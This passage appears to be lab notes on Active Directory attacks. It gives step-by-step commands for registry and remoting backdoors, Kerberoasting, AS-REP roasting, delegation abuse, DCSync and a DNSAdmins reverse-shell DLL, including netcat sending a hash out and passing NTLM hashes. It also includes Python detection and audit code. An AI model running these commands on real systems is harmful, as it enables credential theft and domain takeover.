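            "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-1-2-3-1105)"
            "(A;CI;RP;;;S-1-5-21-1-2-3-1106)")
    for ace in unexpected_grants(parse_dacl(dacl)):
        print(f"review: {ace.sid} holds {', '.join(ace.rights)}")
```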

#Get List Information Using WMI from DC:


Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

But when the user has no ACE yet:

ACLs can be modified to allow non-admin users access to securable objects.

Note: we must run this script as Domain Admin.

# On the local machine for <USER> (adds the user to all namespaces)
Set-RemoteWMI -UserName <USER> -Verbose
# On a remote machine for <USER> without explicit credentials, for a specific namespace
Set-RemoteWMI -UserName <USER> -ComputerName <DC> -namespace 'root\cimv2' -Verbose

After adding the ACL for the namespace we can execute the WMI query again.

Use PowerShell Remoting → Set-RemotePSRemoting.ps1

# On local machine for <USER>


Set-RemotePSRemoting -UserName <USER> -Verbose
# On remote Machine for <USER> without Cred
Set-RemotePSRemoting -UserName <USER> -ComputerName <DC> -Verbose
# On Remote Machine , Remove the permissions
Set-RemotePSRemoting -UserName <USER> -ComputerName <DC> -Remove

After running this command we can execute PS remoting commands:

Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.

Security Descriptor - Remote Registry

#Using DAMP , with Admin privs on remote machine


Add-RemoteRegBackdoor -ComputerName <DC> -Trustee <USER> -Verbose

Load DAMP with Domain Admin privs.

Now run this command as Domain Admin:

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee studentadmin -Verbose

Now on the studentadmin machine run these commands:

# Get Machine Account Hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
# Get Local Account Hash
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
# Get Domain cached credentials
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Priv Esc - Kerberoasting → Decrypt Pass

Kerberoasting allows a user to request a service ticket for any service with a registered
SPN, then use that ticket to crack the service password. If the service has a registered SPN
then it can be Kerberoastable; however, the success of the attack depends on how strong the
password is and whether it is crackable, as well as on the privileges of the cracked service
account.
The service accounts can be linked to hosts like computers (CN=Computers) or domain users
(CN=Users). Each service account can be mapped to a set of running services like MSSQL,
Web, SharePoint, file shares, Exchange services, etc., within the domain, known as Service
Principal Names (SPNs).

📍A Service Principal Name maps the host/user service accounts to running services.
The structure of an SPN consists of 2 main parts: the Service Class (the service type,
i.e., SQL, Web, Exchange, File, etc.) and the Host
where the service is usually running, in the format of FQDN (Fully Qualified Domain Name)
and port number. For example, below, the Microsoft SQL service runs on the dcorp-mgmt host on
port 1433.
The SPN is MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433

Kerberoasting
works best against user service accounts configured with weak passwords, not the host-based
computer accounts that use random 128 character passwords that are changed every 30 days.

🎯 The attack’s goal is to retrieve the cleartext passwords of service accounts to either
escalate our privileges since most service accounts run with admin-related privileges or
pivot laterally within the network.

🚩$_Attack_Pre-requisites
Credentials of a valid domain user service account (not a computer account).

Service Principal Names of the services tied to the service user account.

Service ticket (TGS) for the running service.

Note the vulnerable domain member: a user account with the servicePrincipalName attribute set,
which is a very important piece for Kerberoasting. Only user accounts with that property set
are likely to be susceptible to Kerberoasting.

First we need to identify all the running services mapped to the service account and their
privileges through the SPN attribute.
Attacker enumerating user accounts with the servicePrincipalName attribute set:

#PowerView
Get-NetUser -SPN
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
#ActiveDirectory Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Using only built-in powershell, we can extract the susceptible accounts with:
get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"
#It would have been better to use the following command because of the -filter usage (quicker than select-object)
get-adobject -filter {serviceprincipalname -like "*sql*"} -prop serviceprincipalname

Additionally, user accounts with SPN set could be extracted with a native windows binary:

setspn -T offense -Q */*

Attacker requesting a Kerberos ticket (TGS) for a user account with servicePrincipalName set,
depending on the output above; the ticket gets stored in memory:

# Request a TGS .
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "{ServicePrincipalName}"
#PowerView
Request-SPNTicket

klist → check if the TGS has been granted

Using mimikatz, the attacker extracts kerberos ticket from the memory and exports it to a
file for cracking:

Invoke-Mimikatz -Command '"kerberos::list /export"'

Now I will use nc to transfer the hash to my machine.

# On my Machine :
nc -lvp 443 > ker.bin
# On the target machine
nc <ip> <port> < [PATH_Of_The_Hash]

Cracking the Ticket :

# Using tgsrepcrack.py
python tgsrepcrack.py <PASS_LIST> ker.bin   # Recommended list -> 10k-worst-pass.txt
# Using hashcat

Reference

Observations

Below is a security log 4769 showing service access being requested:

If you see Add-Type -AssemblyName System.IdentityModel

(from advanced PowerShell logging) followed by a Windows security event 4769 immediately
after that, you may be looking at old-school Kerberoasting, especially if the ticket
encryption type has a value of 0x17 (23 decimal, meaning it's RC4 encrypted):

Traffic

Below is the screenshot showing a request being sent to the Ticket Granting Service (TGS) for the
service with a servicePrincipalName HTTP/dc-mantvydas.offense.local :
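The 4769 observation above can be turned into detection logic. The following is an added example, not from the notes: it parses constructed event 4769 records (key=value per line, not real logs), keeps RC4 (0x17) service-ticket requests for non-machine service accounts, and reports requesters that pulled several distinct such tickets within a short window, the burst a Get-NetUser -SPN plus Request-SPNTicket run produces.

```python
"""Flag Kerberoasting patterns in Windows Security event 4769 records.

Added example for these notes; the event lines are constructed, not captured logs.
Fields mirror the 4769 event: TargetUserName is the requesting account and ServiceName is
the service account whose ticket was issued.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Encryption types as logged in the TicketEncryptionType field of event 4769.
ENC_TYPES = {"0x11": "AES128", "0x12": "AES256", "0x17": "RC4-HMAC"}

# Constructed sample: one 4769 event per line as space-separated key=value pairs.
SAMPLE_EVENTS = """\
time=2024-05-01T09:00:01 TargetUserName=student1@DOLLARCORP.MONEYCORP.LOCAL ServiceName=MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433 TicketEncryptionType=0x17 IpAddress=::ffff:172.16.100.1 Status=0x0
time=2024-05-01T09:00:02 TargetUserName=student1@DOLLARCORP.MONEYCORP.LOCAL ServiceName=HTTP/dcorp-appsrv.dollarcorp.moneycorp.local TicketEncryptionType=0x17 IpAddress=::ffff:172.16.100.1 Status=0x0
time=2024-05-01T09:00:02 TargetUserName=student1@DOLLARCORP.MONEYCORP.LOCAL ServiceName=ops/whatever1 TicketEncryptionType=0x17 IpAddress=::ffff:172.16.100.1 Status=0x0
time=2024-05-01T09:01:10 TargetUserName=student1@DOLLARCORP.MONEYCORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:172.16.100.1 Status=0x0
time=2024-05-01T09:05:00 TargetUserName=jane@DOLLARCORP.MONEYCORP.LOCAL ServiceName=MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433 TicketEncryptionType=0x12 IpAddress=::ffff:172.16.100.7 Status=0x0
time=2024-05-01T09:06:00 TargetUserName=DCORP-APPSRV$@DOLLARCORP.MONEYCORP.LOCAL ServiceName=DCORP-DC$ TicketEncryptionType=0x12 IpAddress=::ffff:172.16.100.9 Status=0x0
time=2024-05-01T11:30:00 TargetUserName=bob@DOLLARCORP.MONEYCORP.LOCAL ServiceName=HTTP/dcorp-appsrv.dollarcorp.moneycorp.local TicketEncryptionType=0x17 IpAddress=::ffff:172.16.100.3 Status=0x0
"""


def parse_event(line: str) -> Dict[str, object]:
    """Split a 'key=value key=value' line into a dict and parse the timestamp."""
    ev: Dict[str, object] = dict(tok.split("=", 1) for tok in line.split())
    ev["time"] = datetime.fromisoformat(str(ev["time"]))
    return ev


def is_roast_candidate(ev: Dict[str, object]) -> bool:
    """RC4 service ticket for a user (non-machine) service account: the classic signature.

    Machine accounts ($) and the krbtgt service are excluded because their keys are random
    and not crackable, so tickets for them are not what a Kerberoaster asks for.
    """
    svc = str(ev["ServiceName"])
    return (ev.get("Status", "0x0") == "0x0"
            and ev["TicketEncryptionType"] == "0x17"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def rc4_candidates(events: List[Dict[str, object]]) -> List[tuple]:
    """Every (requester, service) pair that matches the RC4 signature, for low-severity review."""
    return [(str(e["TargetUserName"]), str(e["ServiceName"])) for e in events
            if is_roast_candidate(e)]


def find_kerberoasting(events: List[Dict[str, object]], min_services: int = 3,
                       window: timedelta = timedelta(minutes=5)) -> Dict[str, List[str]]:
    """Map requester -> sorted distinct services for requesters that obtained at least
    min_services distinct RC4 service tickets within any sliding window of `window`."""
    by_user: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_roast_candidate(ev):
            by_user[str(ev["TargetUserName"])].append(ev)
    hits: Dict[str, List[str]] = {}
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            in_window = {str(e["ServiceName"]) for e in evs[i:]
                         if e["time"] - first["time"] <= window}
            if len(in_window) >= min_services:
                hits[user] = sorted(in_window)
                break
    return hits


def load_sample() -> List[Dict[str, object]]:
    return [parse_event(line) for line in SAMPLE_EVENTS.splitlines() if line.strip()]


if __name__ == "__main__":
    events = load_sample()
    for user, services in find_kerberoasting(events).items():
        print(f"possible Kerberoasting by {user}: {len(services)} RC4 tickets ->", services)
    print("all RC4 candidates:", rc4_candidates(events))
```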

Priv Esc - Kerberoasting - AS-REPs - SPN
First of all, what is AS-REP?
AS-REP is a Kerberos message type that refers to an "Authentication Service" (AS) response
message. It is transmitted between a Kerberos server and client as part of the exchange of
credentials needed to access a service.
More Information

What is AS-REP roasting?

It is a technique that allows retrieving password hashes for users that have the "Do not require Kerberos
preauthentication" property selected.

With sufficient rights (GenericWrite or GenericAll), Kerberos preauth
can be forcibly disabled as well.

Enumerate accounts with Kerberos preauth disabled

# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

So, I got two accounts where Kerberos preauth was disabled:

Note: I used the Attacking Kerberos machine from TryHackMe!

Force-disable Kerberos preauth

# Checking current groups ACL rights:

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Disabling kerberos pre-auth for a user:


Set-DomainObject -Identity <USERNAME> -XOR @{useraccountcontrol=4194304} -Verbose

4194304 → DONT_REQ_PREAUTH

Get the hashes of all of them

I'll use Rubeus.exe

Rubeus.exe asreproast /format:hashcat /nowrap [/user:USER] [/outfile:FILEPATH]

# Crack with hashcat

hashcat asreproast.txt -m 18200 /usr/share/wordlists/rockyou.txt --force

Or crack the hash with john

john --format=krb5asrep asrep.txt --wordlist=/usr/share/wordlist/rockyou.txt

Or i can get hash of user by ASREPRoast:

# Use ASREPRoast:
Get-ASREPHash -UserName VPN1user -Verbose
# Do all automatically:
Invoke-ASREPRoast -Verbose

# Crack using John


./john vpn1user.txt --wordlist=wordlist.txt

SET SPN

With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything
(unique in the domain).

We can then request a TGS without special privileges. The TGS can then be "Kerberoasted".

PowerView_dev

# Viewing our ACL permissions:


Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Check if user has SPN:


Get-DomainUser -Identity supportuser | select serviceprincipalname

ADModule

# Check if user has SPN already:
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName

Setting an SPN (must be unique for the domain):

PowerView_dev

Set-DomainObject -Identity USER -SET @{serviceprincipalname='ops/whatever1'}

## Clean up
Set-DomainObject -Identity USER -clear serviceprincipalname

ADModule

Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}

After Set SPN:

Extraction and cracking same as kerberoasting.

Request a ticket

Add-Type -AssemblyName System.IdentityModel


New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"

klist

Export all tickets using Mimikatz

Invoke-Mimikatz -Command '"kerberos::list /export"'

Brute-force the password

python.exe .\tgsrepcrack.py .\10k-passwords.txt '.\2-40a10000-student1@ops~whatever1-dollarcorp.moneycorp.LOCAL.kirbi'

Priv Esc - Kerberos Delegation

What is Delegation?
Delegation is the act of giving someone authority or responsibility to do something on
behalf of someone else.
Giving someone permission or authority on behalf of another person.

In the Active Directory,


is a feature that enables specific accounts ( user or computer ) to impersonate other accounts to
access particular services on the network.

🟥 Types of delegation allowed with Kerberos:

1. Unconstrained → General/Basic.

2. Constrained.

3. Resource-based Constrained Delegation.

Unconstrained:
Allows the first hop server ( web server in Example ) to request access to any service on

any computer in the domain.

1. User Authenticate to DC

2. DC return TGT

3. User Request TGS for a web Service

4. DC provides the TGS

Exactly like normal Kerberos authentication so far.

5. User sends TGT & TGS to the web server (the user's TGT is also embedded inside the TGS). Here is the idea of delegation.

6. Web Server service account Use user TGT to request a TGS for DB server from the dc

7. Web Server Service Account connects to database server AS user

🔴 Important
The TGT is extracted from TGS and Stored in LSASS, This way the server
can reuse the user’s TGT to access any other resource as The user

#PowerView;
Get-NetComputer -Unconstrained

#ADModule;
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

In this output:
dcorp-dc → a DC always shows up with unconstrained delegation enabled, so skip it.
dcorp-appsrv → we will focus on this machine.

🚩Attack Requirements:
1. A user or computer account with the delegation option enabled (dcorp-appsrv)

2. Local admin privileges on the delegated compromised host:

We need to compromise the server(s) where unconstrained delegation is enabled.

So, we need a machine where we have local admin privileges:

sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /ntlm:d549831a955fee51a43c83efb3928fa7 /run:powershell.exe

And then inside the appadmin machine check whether the computer has local admin access:

Find-LocalAdminAccess

Nice, I found this machine has local admin access and also unconstrained delegation.

Via the appsrv machine we can extract any user's TGT on appsrv.

#Inside appadmin box


# Create session appsrv
$sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local
# Load MimiKatz on This machine appsrv
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

So, It’s Detected By AMSI, We need to bypass it

# Enter-PSSession
Enter-PSSession -Session $sess

Now Load the script:

Export all Avalible Ticket on this machine appsrv

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'   # /export saves the tickets to disk
ls | select name

appadmin and appsrv are not interesting, so let's wait for any interesting ticket to be present.

# Use Invoke-UserHunter -Poll -> to catch the ticket from any user that performs some operation

Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

We’ll wait for any session from Administrator

Now run again Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

And boom, we got it.

So now use Mimikatz to pass the ticket:

Invoke-Mimikatz -Command '"kerberos::ptt <name_of_ticket>"'

This way helps us escalate to domain admin from unconstrained delegation.

Constrained:
( Specified Services on Specified Computers )

If you have compromised a user account or a computer (machine account)
that has Kerberos constrained delegation enabled, it's possible to
impersonate any domain user (including administrator) and authenticate
to a service that the user account is trusted to delegate to.

Allows the account with "Trust this user/computer for delegation to specified services only" enabled
to impersonate ANY user to access the specific services listed in the allowed delegation list.

As seen below in Figures 1 and 2, delegation properties are set for
specific service types and hosts (Service Principal Names - SPNs) for user
or computer accounts.

This is the configuration of constrained delegation for a USER

This is the configuration of constrained delegation for a Computer

So, this type of delegation gives a massive responsibility to the front-end services to
authenticate the user. In this case, the user doesn't authenticate to the Kerberos domain controller (KDC)
directly. Instead, it authenticates to the service first, then the service
impersonates the user to access the requested resource.

🔴 Note
A user must have a valid TGT to request a TGS. So how does the user get a valid TGT?

1. Initially by sending a timestamp which is encrypted and signed with the NTLM hash of the user's
password.

To impersonate the user, the Service For User (S4U) extension is used.
The Kerberos protocol does this type of delegation with two (2) extensions:

1. Service for User to Self (S4U2Self): Kerberos protocol transition extension.

a. The service requests a TGS for itself from the DC without supplying the password.

b. The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D)
UserAccountControl (UAC) attribute.

c. Allows a service to obtain a forwardable TGS to itself on behalf of a user.

i. Just with the user principal name, without supplying a password.

2. Service for User to Proxy (S4U2Proxy): Kerberos Constrained Delegation extension.

a. Allows a service to obtain a TGS to a second service on behalf of a user.

i. Because this is constrained delegation, a TGS cannot be requested for any service; it must be a
specific service, controlled by the msDS-AllowedToDelegateTo attribute. This contains the list
of SPNs to which the user's TGS can be forwarded.

Authentication Flow:

Steps 2 and 3 allow the web server to obtain a TGS for itself as Joe User (impersonating
joe).
Steps 5 and 6: the KDC checks the value of msDS-AllowedToDelegateTo on the websvc account; if it
matches CIFS/dcorp-mssql then the KDC will return the TGS for dcorp-mssql as joeuser.

Here I notice that the ticket I got is only for one service, CIFS on the dcorp-mssql machine,
and this shows me the difference between constrained and unconstrained.

To abuse the constrained delegation in the above scenario, we need to have access to the
websvc account. If we have access to that account, it is possible to access the services
listed in msDS-AllowedToDelegateTo of the websvc account as ANY user.
🚩Attack Requirements:
A user or computer account with the delegation option enabled:

"Trust this user/computer for delegation to specified services only"

Local admin privileges on the delegated compromised host:

"If you compromised the server as a regular user, you need to escalate to admin to abuse this delegation feature."

# Enumerate users and computers with constrained delegation enabled


# PowerView ( dev )
Get-DomainUser -TrustedToAuth

Get-DomainComputer -TrustedToAuth
# PowerView
Get-NetUser -TrustedToAuth
Get-NetComputer -TrustedToAuth
# ADModule
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
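The enumeration commands in this section, the Kerberoasting enumeration (accounts with an SPN) and the AS-REP enumeration (accounts with preauth disabled) all read the same attributes. Here is an added example, not code from the notes or any tool, that audits constructed account records (userAccountControl, servicePrincipalName, msDS-AllowedToDelegateTo) for all of those exposures at once; the account list mirrors the lab names and the websvc SPN is invented.

```python
"""Audit AD account attributes for the Kerberos exposures covered in these notes.

Added example, not code from the notes or any project. The account records below are
constructed to mirror the lab names; in practice they would come from Get-ADUser /
Get-ADComputer output with userAccountControl, servicePrincipalName and
msDS-AllowedToDelegateTo selected.
"""
from typing import Dict, List

# userAccountControl bit flags (Microsoft UF_* values).
ACCOUNTDISABLE = 0x2
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000                 # domain controllers
TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
DONT_REQ_PREAUTH = 0x400000                   # 4194304, the value the notes XOR in
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # T2A4D, protocol transition (S4U2Self)

# Constructed sample directory (the websvc SPN is invented for the example).
ACCOUNTS = [
    {"sam": "dcorp-dc$", "uac": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "spn": ["ldap/dcorp-dc.dollarcorp.moneycorp.local"], "delegate_to": []},
    {"sam": "dcorp-appsrv$", "uac": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "spn": ["HOST/dcorp-appsrv.dollarcorp.moneycorp.local"], "delegate_to": []},
    {"sam": "dcorp-adminsrv$", "uac": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "spn": ["HOST/dcorp-adminsrv.dollarcorp.moneycorp.local"],
     "delegate_to": ["time/dcorp-dc.dollarcorp.moneycorp.local"]},
    {"sam": "websvc", "uac": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "spn": ["HTTP/dcorp-web.dollarcorp.moneycorp.local"],
     "delegate_to": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.local"]},
    {"sam": "vpn1user", "uac": NORMAL_ACCOUNT | DONT_REQ_PREAUTH, "spn": [], "delegate_to": []},
    {"sam": "krbtgt", "uac": NORMAL_ACCOUNT | ACCOUNTDISABLE, "spn": ["kadmin/changepw"],
     "delegate_to": []},
    {"sam": "oldsvc", "uac": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "spn": ["MSSQLSvc/old.dollarcorp.moneycorp.local:1433"], "delegate_to": []},
]


def is_computer(acct: dict) -> bool:
    return bool(acct["uac"] & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))


def spn_hosts(spns: List[str]) -> List[str]:
    """'CIFS/host.fqdn:port' -> 'host.fqdn'. The service class is what to report because,
    as the notes say, any service on that host running under the same account accepts the ticket."""
    return sorted({spn.split("/", 1)[-1].split(":")[0].lower() for spn in spns})


def audit_account(acct: dict) -> List[str]:
    uac = acct["uac"]
    findings: List[str] = []
    if uac & ACCOUNTDISABLE:
        return findings                      # a disabled account cannot be roasted or delegate
    if uac & DONT_REQ_PREAUTH:
        findings.append("preauth disabled: AS-REP roastable")
    if acct["spn"] and not is_computer(acct) and acct["sam"].lower() != "krbtgt":
        findings.append("user account with SPN: Kerberoastable")
    if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
        # DCs always carry this flag; the notes skip dcorp-dc for that reason.
        findings.append("unconstrained delegation: caches every caller's TGT")
    if acct["delegate_to"]:
        kind = ("with protocol transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION
                else "Kerberos-only")
        findings.append(f"constrained delegation {kind} to "
                        f"{', '.join(spn_hosts(acct['delegate_to']))}")
    return findings


def audit(accounts: List[dict]) -> Dict[str, List[str]]:
    """Map sAMAccountName -> findings, omitting accounts with nothing to report."""
    report: Dict[str, List[str]] = {}
    for acct in accounts:
        findings = audit_account(acct)
        if findings:
            report[acct["sam"]] = findings
    return report


if __name__ == "__main__":
    for sam, findings in audit(ACCOUNTS).items():
        print(sam)
        for finding in findings:
            print("  -", finding)
```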

Two Object Name:

1. Name → websvc , Service → CIFS

2. Name → DCORP-ADMINSRV , Service → time

So websvc just delegate to CIFS

And DCORP-ADMINSRV delegate to time

PowerView_dev

💥 Time to abuse this account and get the privileges:

Before we can access the dcorp-adminsrv box we can use the NTLM hash or the plaintext password.

OR

With asktgt from kekeo, we request a TGT (steps 2 & 3 in the diagram).

kekeo# tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Kekeo is a tool that reads and writes tickets in LSASS without injecting into LSASS.

Now that we have a TGT we request a TGS using s4u from kekeo (steps 4 & 5):

tgs::s4u /tgt:<PATH_OF_TICKET> /user:Administrator@dollarcorp.moneycorp.local /service:cifs-dcorp-mssql.dollarcorp.moneycorp.l

Here I chose the Administrator user (or any user), provided the TGT was requested by the websvc
user, and then I put the name of the service that the delegating user is allowed to access.

Now we use a Mimikatz to inject the TGS ticket and whoooa we got it:

Invoke-Mimikatz -Command '"kerberos::ptt <Name_File_Of_Ticket_TGS>"'

Now we can access just the file system on the dcorp-mssql machine.

ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

But we cannot use any other protocol against dcorp-mssql; with
Get-WmiObject or Enter-PSSession we get access denied.
So what can we do after this?
We can actually access all those services on the machine which run under the same account,
as there is no validation of the SPN specified.
That means that if we have delegation for CIFS on dcorp-mssql we can access all those
services which use the same user account as CIFS.

This is huge, as it allows access to many interesting services when
the delegation may be for a non-intrusive service!

When we enumerated delegation users we had another machine called dcorp-adminsrv,
so request a TGS for the other machine.

We have the NTLM hash of adminsrv from before.

After requesting a TGT we request a TGS, but here there is a difference:

Here we not only get access to time, we can access ldap on the DC as Administrator,
impersonating that administrator.
That means we can run the "DCSync" attack without having domain admin privileges
for our current user.

# Request a TGT
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67

# Request a TGS ticket


tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi

We are requesting, as Administrator, a ticket not only for time but also for the ldap service.

If you notice here, I don't have access to another service, but via the first machine I was able to
reach more than one service on the second machine as admin.

Now Injected By mimikatz

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorpdc.


Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

To abuse constrained delegation for dcorp-adminsrv$ using Rubeus, we
can use the following command (we are requesting a TGT and TGS in a
single command):

.\Rubeus.exe s4u /user:dcorp-adminsrv$ /rc4:1fadb1b13edbc5a61cbdc389e6f34c67 /impersonateuser:Administrator /msdsspn:"time/dco

After injection, we can run DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Priv Esc - DNSAdmins

A very interesting privilege escalation, by abusing the privileges of the DNSAdmins group.
This method can be used when we have access to a user account which happens to be a member of
the DNSAdmins group, or when the compromised user account has write privileges to a DNS server
object. It then has the capability to load an arbitrary DLL with the privileges of dns.exe (SYSTEM
level privileges).

You can check if a user is in the DNSAdmins group by using the command:

net user <userName> /domain

e.g => net user spotless /domain

If the output contains DNSAdmins in its group memberships, then the user belongs to the
group and we can abuse this membership to escalate to Administrator rights.

If we have access to a member of the DNSAdmins group we can run a DLL that runs our code to
execute something else, like a reverse shell with SYSTEM privileges.

Note: the DNSAdmins group must have privileges to restart the DNS service.

Note: the default configuration will not allow restarting the server.

Now we need to enumerate the members of the DNSAdmins group:

# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"
# OR
Get-NetGroupMember DNSAdmins

Now we need to compromise a member; we already have the hash of srvadmin because of
derivative local admin.

We will build a DLL which contains reverse tcp code and inject it into the dns.exe process on the victim's DNS server
(DC). In case your work requires building a DLL which exports all necessary functions, refer to
this post or this screenshot
for building the DLL instead of msfvenom. You can also use a remote DLL injector.

Building The DLL:


we need to build a DNS plugin DLL that we will be injecting into a dns.exe process on a
victim DNS server (DC). Below is a screenshot of the DLL exported functions that are
expected by the dns.exe binary when loading a plugin DLL. I have also added a simple system
command to invoke a netcat reverse shell once the plugin is initialized and code is
executed.
I then tested the function with rundll32 as shown below, which returned a reverse shell to
my attacking machine - code gets executed, shell gets spawned:

rundll32.exe .\dnsprivesc.dll,DnsPluginInitialize

Building the DLL using msfvenom:
While building a payload you have to take the target machine's architecture into consideration
too (x86/x64).

One thing I learned during this pentest lab was that meterpreter shells
are blocked by Antivirus/Windows Defender, to be specific, the staged
ones. The difference between staged and stageless payloads is described
in detail in this rapid7 post.

I later found that stageless payloads have limitations which do not allow DLL injections
for now; it can be tracked in this GitHub issue. So I decided to go for simpler payloads
without meterpreter. My victim had a 64-bit arch, so I generated a DLL with the following command:

msfvenom -a <ARCH> -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <TYPE_FILE>


#eg
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f dll > privesc.dll

Hosting the payload:


Once the payload is generated, we have to find a way to access the payload in victim’s
machine. There are plenty of ways to transfer files to windows from Linux, but in this
case, we will use smb server to host the file .

We are choosing this, because windows supports UNC paths and samba shares by default in
most cases. Also, there are times when the victim’s AV or defender may delete the payload
if uploaded, so we’ll stick with smb server for this one. However dealing with smb can be
quite tricky on *nix, but luckily we have scripts that can make the process a lot easier.
We will use Impacket’s smb server, to host our file.

sudo python smbserver.py <shareName> <path/of/share>


eg: sudo python smbserver.py share ./

You can check if the server is working by using smbclient on a new terminal,

smbclient -L your_smb_server_ip --no-pass
# (assuming you didn't set username and password)
eg: smbclient -L 192.168.43.100 --no-pass

you can also check if the victim is able to access the share using the following command on
victim’s shell,

net view \\your_smb_server_ip


#eg: net view \\192.168.43.100

As you can see accessing smb share is really easy by using UNC paths.
for example, to access our privesc.dll, we can simply use the following
UNC path \\192.168.43.100\share\privesc.dll

Abuse DNS with dnscmd:

dnscmd is a Windows utility that allows people with DnsAdmins privileges to
manage the DNS server. The utility can be installed by adding DNS Server
Tools to your system as shown in the below screengrab.

🔴 Now that we have the DLL and we checked that it is working, configure the DNS server
to load our malicious DLL (from the network share on host 10.0.0.2) next
time the service starts (or when the attacker restarts it):

dnscmd dc01 /config /serverlevelplugindll \\10.0.0.2\tools\dns-priv\dnsprivesc.dll

Resource → https://www.ired.team/offensive-security-experiments/active-directory-kerberos-
abuse/from-dnsadmins-to-system-to-domain-compromise

With the privileges of a DNSAdmins group member, configure the DLL using
dnscmd.exe
(needs RSAT DNS ⇒ Remote Server Administration Tools are required)

dnscmd <FQDN of DC> /config /serverlevelplugindll \\UNC_path_For_DLL

# eg
dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll

Normally we cannot check if the DLL was added, as it requires Administrator privileges, but in our
case we did have an admin account, so we can check using the following command:

Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

Listening for connection and restarting dns if required:
We can use a normal listener like nc for listening on the proper port. In case you don’t
get a connection, you can try restarting the dns server on your own. this is possible
because the victim is part of DNSAdmins group.

Listener: nc -lvnp 4444

#For restarting the server


sc.exe \\<FQDN of DC> stop dns
sc.exe \\<FQDN of DC> start dns

And that’s it, you should have a shell with Administrator privileges by
now.

C:\>whoami
nt authority\system

Right click on the dll folder → Properties → Sharing → Share → choose Everyone for Read/Write

Get a PowerShell as the srvadmin user:

and run this command:

It loads the DLL inside the DNS service on the DC.

We need to restart the service :

sc \\dcorp-dc stop dns


sc \\dcorp-dc start dns

Event ID ⇒ 770: that means the DLL is loaded into the DNS service.

There is a new file called kiwidns in the System32 dir.

By default, mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log

We can use a system function to execute a reverse shell, PowerShell-encoded or
whatever you want:

